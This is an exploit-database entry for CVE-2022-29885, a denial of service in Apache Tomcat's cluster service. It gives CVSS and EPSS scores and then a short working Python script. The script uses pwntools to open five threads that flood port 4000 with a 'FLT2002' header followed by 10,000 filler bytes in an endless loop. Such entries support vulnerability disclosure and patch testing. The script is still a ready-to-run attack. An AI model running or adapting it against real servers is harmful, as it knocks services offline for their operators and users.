Apache Tomcat 10.1 - Denial Of Service

2023-04-0500:00:00

Cristian Giustini

www.exploit-db.com

206

apache tomcat

denial of service

cve-2022-29885

exploit

remote code execution

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

7.9 High

AI Score

Confidence

High

0.029 Low

EPSS

Percentile

90.8%

JSON

# Exploit Title:  Apache Tomcat 10.1 - Denial Of Service
# Google Dork: N/A
# Date: 13/07/2022
# Exploit Author: Cristian 'void' Giustini
# Vendor Homepage: https://tomcat.apache.org/
# Software Link: https://tomcat.apache.org/download-10.cgi
# Version: <= 10.1
# Tested on: Apache Tomcat 10.0 (Docker)
# CVE : CVE-2022-29885 (CVE Owner: 4ra1n)
# Exploit pre-requirements: pip install pwntools==4.8.0
# Analysis : https://voidzone.me/cve-2022-29885-apache-tomcat-cluster-service-dos/ 

 

 

#!/usr/bin/env python3

# coding: utf-8

from pwn import *

import time

import threading

import subprocess

threads = []

 

 

def send_payload():

    r = remote("localhost", 4000)

    while True:

        r.send(b"FLT2002" + b"A" * 10000)

 

for _ in range(5):

    new_thread = threading.Thread(target=send_payload)

    threads.append(new_thread)

    new_thread.start()

for old_thread in threads:

    old_thread.join()